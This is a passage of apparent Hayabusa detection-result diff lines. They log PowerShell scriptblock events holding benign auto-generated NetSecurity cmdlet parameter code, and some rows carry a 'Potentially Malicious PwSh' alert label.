[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 